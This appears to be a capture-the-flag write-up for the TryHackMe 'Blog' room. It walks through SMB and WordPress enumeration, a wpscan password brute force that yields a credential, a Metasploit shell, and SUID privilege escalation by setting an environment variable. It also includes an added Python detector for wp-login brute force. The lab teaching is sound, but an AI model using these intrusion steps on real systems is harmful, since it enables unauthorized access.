[THM] Blog (practice write-up)

TryHackMe room for this write-up: https://tryhackme.com/room/blog

Difficulty: Medium

Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome!

Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…

In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.

Credit to Sq00ky for the root privesc idea ;)

Port scan

nmap -p- -sC -sV -T4 10.10.131.180

image-20231202172417395

PORT  STATE SERVICE
22    open  ssh
80    open  http
139   open  netbios-ssn
445   open  netbios-ssn

First we notice the SMB ports, so we try enumerating them with enum4linux:

enum4linux -a 10.10.131.180

image-20231202161126853

We can see a share called BillySMB:

smbclient //10.10.131.180/BillySMB

image-20231202172829736

Download the files.

image-20231202173503032

image-20231202173954555

image-20231202174006229

We find a rabbit hole. What does that mean?

There is also a QR code, which redirects to:

https://qrgo.page.link/M6dE

The last file is an mp4.

This looks like a dead end.

So let's check port 80 first and see what is there:

gobuster dir -u 10.10.131.180 -w /usr/share/wordlists/rockyou.txt

Check robots.txt:

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

This is a very standard WordPress site. For enumeration we have a great tool called wpscan, which lets us enumerate usernames and then brute-force their passwords.

But 10.10.131.180/wp-admin/ does not seem to be reachable.

So we edit /etc/hosts:

10.10.131.180 blog.thm

wpscan --url 10.10.131.180 --enumerate u

image-20231202175807477

image-20231202175917423

There are two users: bjoel and kwheel.

And it is running a vulnerable WordPress 5.0.

image-20231205224949149

Reading it, we learn that we need the username and password of a user with Author access.

So let's start brute-forcing:

wpscan --url 10.10.90.177 -U kwheel,bjoel -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64

| Username: kwheel, Password: cutiepie1

Logged in successfully.
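As an added defender-side example (not part of the original write-up), here is a small Python detector for the kind of wp-login brute force run above: it parses Apache combined-format access-log lines (constructed sample data, not the room's target) and flags any source that bursts POSTs to /wp-login.php, noting whether a 302 (the redirect WordPress issues on a successful login, versus 200 for a failed one) followed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def _line(ip, sec, status, ua):
    return (f'{ip} - - [05/Dec/2023:23:20:{sec:02d} +0000] '
            f'"POST /wp-login.php HTTP/1.1" {status} 4127 "-" "{ua}"')

# Constructed sample log (not from the room's target): a WPScan-style burst of
# failed logins (WordPress re-renders the form with HTTP 200), then one 302,
# which is what WordPress returns on a successful login; plus one ordinary user.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", s // 5, 200, "WPScan v3.8") for s in range(12)]
    + [_line("10.0.0.5", 3, 302, "WPScan v3.8")]
    + [_line("192.168.1.9", 40, 302, "Mozilla/5.0")])

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])

def detect_wp_login_bruteforce(log_text, threshold=10, window=timedelta(seconds=60)):
    """Flag each source IP with at least `threshold` POSTs to /wp-login.php inside
    any `window`-long span; `succeeded` marks whether that IP also got a 302."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            posts[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, events in posts.items():
        events.sort()
        times = [t for t, _ in events]
        start = peak = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[ip] = {"attempts": len(events),
                            "succeeded": any(st == 302 for _, st in events)}
    return findings
```

Running `detect_wp_login_bruteforce(SAMPLE_LOG)` on the constructed log flags only 10.0.0.5, with 13 attempts and `succeeded` set; a single legitimate 302 from another address is not reported.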

image-20231205232506171

Then we use msf (Metasploit).

image-20231205232601459

image-20231205232641654

image-20231205232816396

Now just set the options (USERNAME, PASSWORD, RHOSTS, LHOST) and run the exploit!

image-20231205233252882

We get a shell.

image-20231205233445283

find / -perm -u=s -type f 2>/dev/null

image-20231206000323274

image-20231206001851404

So it reads the "admin" environment variable and prints "Not an Admin". Wait, what happens if we set that environment variable ourselves?

export admin=1

image-20231206002116230

image-20231206002157143

image-20231206002209026

image-20231206002223610

image-20231206002300668